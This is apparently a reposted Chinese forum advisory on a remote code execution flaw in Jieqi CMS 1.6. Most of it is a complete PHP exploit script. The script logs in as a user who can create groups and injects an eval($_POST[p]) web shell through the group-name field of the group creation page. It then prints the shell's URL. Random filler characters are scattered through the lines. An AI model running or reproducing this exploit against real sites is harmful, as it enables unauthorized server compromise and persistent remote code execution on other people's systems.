杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
3 m; S3 x' @4 T/ \
+ _0 o0 L6 L7 h' c6 A; N
* _ W+ z" L1 [. }( K2 V该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
, }% Q7 P8 d. v% T7 F9 F* \ 需要有一个能创建圈子的用户。: k! i; c0 u; `8 z3 R
, h5 ^9 i2 p ^/ x7 D; u<?php/ e4 z, I# w+ n7 ?
. ?! q6 X1 f0 S( @2 p# U& g; w: `print_r('
6 i' ]% H* z# i7 H0 e5 L9 j; {+---------------------------------------------------------------------------+) O" A4 m! T q$ B$ R" D3 H
Jieqi CMS V1.6 PHP Code Injection Exploit
+ s* b5 K$ P& ?8 R. a) O6 Hby flyh4t
; O. }) S0 d, M9 {" `6 J' T8 Mmail: phpsec at hotmail dot com! j: s3 g% y& _. Q
team: http://www.wolvez.org
8 e0 J' Q8 U- |& n$ E( [) x+---------------------------------------------------------------------------+
+ r2 z( V, O7 G! Z# |'); /**
2 }* U' f! U2 X; U5 n' l# T6 |2 d. b * works regardless of php.ini settings' m( A* G% K& l
*/ if ($argc < 5) { print_r('
9 d& x$ c, f: d% X: U+---------------------------------------------------------------------------+# }% X& g5 ^" m0 y4 R
Usage: php '.$argv[0].' host path username
3 K3 Q8 J$ @8 _* e Rhost: target server (ip/hostname). K# o1 x1 {: ^* \5 j, u+ B7 k
path: path to jieqicms
, ~* y8 w6 H* g0 ~+ _* _# W% q+ q+ k* Ruasename: a username who can create group! C0 ~/ P6 H# c: ^6 y' z
Example:1 ~1 N* y9 ?6 l3 Q! z
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
3 a9 c/ T# \5 w/ Q* l) z) P6 `: M+---------------------------------------------------------------------------+" |7 j7 P4 r4 }* E/ e
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
/ c5 D6 s( _4 @% y2 O: lContent-Disposition: form-data; name="gname"! u1 @8 z5 m# v. P* E1 ?3 s9 m
M6 X& {' @6 R9 X* G( M/ ^'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
3 Q2 b/ q6 Q, ?- ]; o7 i-----------------------------23281168279961
R0 x4 ^, R' [3 m J" \' xContent-Disposition: form-data; name="gcatid"
& N, c& }) f1 b) D* P( d" o
8 H3 U7 @1 H- O1
6 O$ A, n. t$ U9 y6 g( {2 h3 E& X-----------------------------232811682799614 d" H: ]% H' w# x# L* ?" Z7 S- ^
Content-Disposition: form-data; name="gaudit"; V, Q9 N, ^& `1 M h
; J8 Y; Y% o* Z, Y10 b' _9 A# P5 \( B1 O- Z: t3 m
-----------------------------23281168279961
t# p- K6 b2 e$ Z! s. wContent-Disposition: form-data; name="gbrief"* S* Z5 m1 l! p$ K# E
6 S9 H! {2 K7 V1 |: P+ f) b1
7 C# E9 f: P3 Q* F5 A6 B-----------------------------23281168279961--9 Z# G9 w/ t- R5 z8 v& ?
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com6 {: j9 a2 q: ~6 w: I
0 ^/ ~" n/ g! a- ]preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |